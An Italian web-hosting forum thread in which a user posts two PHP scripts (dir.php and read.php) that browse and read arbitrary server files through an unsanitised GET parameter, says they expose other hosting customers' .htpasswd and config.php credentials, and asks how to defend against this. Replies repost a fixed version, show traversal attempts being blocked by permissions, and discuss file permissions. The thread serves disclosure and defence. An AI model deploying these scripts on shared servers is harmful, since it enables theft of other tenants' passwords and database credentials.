Pagina 1 di 3 1 2 3 ultimoultimo
Visualizzazione dei risultati da 1 a 10 su 29

### GROSSI PROBLEMI DI SICUREZZA!!!! ###

ATTENZIONE!!!
    Come è possibile che la maggior parte dei servizi hosting sono completamente senza difese applicando questi due script presenti nella documentazione ufficiale di php (funzioni dir e getc):

//1° SCRIPT nominarlo dir.php
    <HTML><HEAD><TITLE>Lettura Cartelle</TITLE></HEAD>
    <BODY style="font: 11px/18px tahoma,arial;">
    <?php $Cartella = $_GET['Cartella']; if (!$Cartella) $Cartella=$_SERVER['DOCUMENT_ROOT']; $ClassDir = dir($Cartella); echo "Percorso: ".$ClassDir->path."
    \n"; ?>
    <table cellpadding=0 cellspacing=0 border=0 style="font: 11px/18px tahoma,arial;">
    <?php
    while ($j = $ClassDir->read()) {
    if ($Cartella!="/") $k = $Cartella."/".$j; else $k = "/".$j;
    $i++; $ty = filetype($k);
    if ($ty=="dir") $text = sprintf("<tr style=\"padding: 0px 5px;\"><td>%03d</td><td>%s</td><td>%s</td><td>%04o</td><td>%s</td><td>%s</td><td>%d</td><td><a href=\"/dir.php?Cartella=%s\">%s</a></td>\r\n",$i
    ,date("H:i:s Ymd",filemtime($k)),$ty,fileperms($k),fileowner($k ),filegroup($k),filesize($k),$k,$j);
    else
    $text = sprintf("<tr style=\"padding: 0px 5px;\"><td>%03d</td><td>%s</td><td>%s</td><td>%04o</td><td>%s</td><td>%s</td><td>%d</td><td><a href=\"/read.php?File=%s\">%s</a></td>\r\n",$i
    ,date("H:i:s Ymd",filemtime($k)),$ty,fileperms($k),fileowner($k ),filegroup($k),filesize($k),$k,$j);
    echo $text;
    }
    $ClassDir->close(); ?>
    </table>
    </BODY>

//2° SCRIPT read.php
    <?php $File=$_GET['File'];
    if ($fp=fopen($File, 'r')) while(false!==($char=fgetc($fp))) echo $char; ?>

In poche parole, usando questi due script e specificando bene il percorso del dominio sul server del provider, riesco a vedere la mia cartella web ma anche tutti gli altri piani di hosting, muovendosi avanti e indietro...
    Si riesce a leggere tranquillamente i file .htaccess, .htgroup, .htpasswd di altri domini che non appartegono al proprio dominio!!!!
    Non solo, ma si riescono a vedere tutti i sorgenti di tutti i domini, specialmente i file config.php o altri simili dove sono contenuti user e password di accesso ai piani hosting o database...

Questo l'ho provato sia sul mio server dedicato, acquistato presso uno dei tanti provider come piano di affitto, e sia su altri provider (importanti e conosciuti) utilizzando offerte hosting di miei clienti...

HO CONTATTATO DIVERSI PROVIDER PER RISOLVERE IL PROBLEMA!!! LA RISPOSTA E' STATA PER ALCUNI NEGATIVA,PER ALTRI ERA UN'INCOGNITA...

COME DIFENDERSI??? CHE COSA FARE???
    COME USARE SUEXEC CON PHP COME MODULO APACHE E/O MODULO CGI???
    COME RENDERSI INVISIBILI DA TALI SCRIPT (SENZA DOVER RINUNCIARE A PHP ED FOPEN())???

GRAZIE...
    Grazie, Davidenet...
    :-)

io sto dando un'occhiata a quanto hai detto, ma mi sembra che uno possa uplodare il file solo nella propria cartella e quindi anche se vede il file della propria cartella non succede nulla. Non mi funziona comunque cliccando su una cartella che mi apra nessun file...mi dà pagina non trovata
    Talvolta anche una persona apparentemente inutile si rivela un abile samurai dalla forza di mille uomini, dimostrando di poter rinunciare alla vita e che il suo cuore si è completamente identificato con quello del suo padrone

è solo una questione di permessi
    One bug, one crash

Originariamente inviato da 13manuel84
    io sto dando un'occhiata a quanto hai detto, ma mi sembra che uno possa uplodare il file solo nella propria cartella e quindi anche se vede il file della propria cartella non succede nulla. Non mi funziona comunque cliccando su una cartella che mi apra nessun file...mi dà pagina non trovata

//1° SCRIPT nominarlo dir.php
    <HTML><HEAD><TITLE>Lettura Cartelle</TITLE></HEAD>
    <BODY style="font: 11px/18px tahoma,arial;">
    <?php $Cartella = $_GET['Cartella']; if (!$Cartella) $Cartella=$_SERVER['DOCUMENT_ROOT']; $ClassDir = dir($Cartella); echo "Percorso: ".$ClassDir->path."
    \n"; ?>
    <table cellpadding=0 cellspacing=0 border=0 style="font: 11px/18px tahoma,arial;">
    <?php
    while ($j = $ClassDir->read()) {
    if ($Cartella!="/") $k = $Cartella."/".$j; else $k = "/".$j;
    $i++; $ty = filetype($k);
    if ($ty=="dir") $text = sprintf("<tr style=\"padding: 0px 5px;\"><td>%03d</td><td>%s</td><td>%s</td><td>%04o</td><td>%s</td><td>%s</td><td>%d</td><td><a href=\"dir.php?Cartella=%s\">%s</a></td>\r\n",$i
    ,date("H:i:s Ymd" ,filemtime($k)),$ty,fileperms($k),fileow
    ner($k),filegroup($k),filesize($k),$k,$j
    );
    else
    $text = sprintf("<tr style=\"padding: 0px 5px;\"><td>%03d</td><td>%s</td><td>%s</td><td>%04o</td><td>%s</td><td>%s</td><td>%d</td><td><a href=\"read.php?File=%s\">%s</a></td>\r\n",$i
    ,date("H:i:s Ymd" ,filemtime($k)),$ty,fileperms($k),fileow
    ner($k),filegroup($k),filesize($k),$k,$j
    );
    echo $text;
    }
    $ClassDir->close(); ?>
    </table>
    </BODY>

usa questo
    One bug, one crash

basterebbe saper usare i permessi...

guarda che bello

Warning: dir(/localhost/astm//SATAP/../../../../etc/../home/sathia/../../../root): failed to open dir: Permission denied in /new/localhost/astm/SATAP/dir.php on line 4
    One bug, one crash

Utente di HTML.it L'avatar di Kevin
    anche a me

Warning: dir(/home/etracks/public_html/..): failed to open dir: Permission denied in /home/etracks/public_html/dir.php on line 3
    Percorso:

Fatal error: Call to a member function on a non-object in /home/etracks/public_html/dir.php on line 6
    Non ti accontentare mai. Raggiungi il successo e poi rinizia da capo.
    Non si ha mai una seconda possibilità per fare una bella prima impressione.
    Punti d'immersione in Italia e all'estero
    Template per siti web

read write exec, sta tutto lì il problema.

certo che certi server sono configurati una schifezza eh
    One bug, one crash

Utente di HTML.it L'avatar di Kevin
    posso darti un consiglio ... toglilo da qui
    Non ti accontentare mai. Raggiungi il successo e poi rinizia da capo.
    Non si ha mai una seconda possibilità per fare una bella prima impressione.
    Punti d'immersione in Italia e all'estero
    Template per siti web

teribbile
    One bug, one crash

si si la questione dei permessi e tutto l'ho capito (grazie per le spiegazioni ), mi resta solo una cosa, siccome solo noi possiamo uploadare nelle nostre cartelle e nei nostri siti, basta non mettere quei file (altrimenti siamo poco svegli noi) ed è tutto risolto, visto che non posso mettere un url a caso come path, o no?
    Talvolta anche una persona apparentemente inutile si rivela un abile samurai dalla forza di mille uomini, dimostrando di poter rinunciare alla vita e che il suo cuore si è completamente identificato con quello del suo padrone

Permessi di invio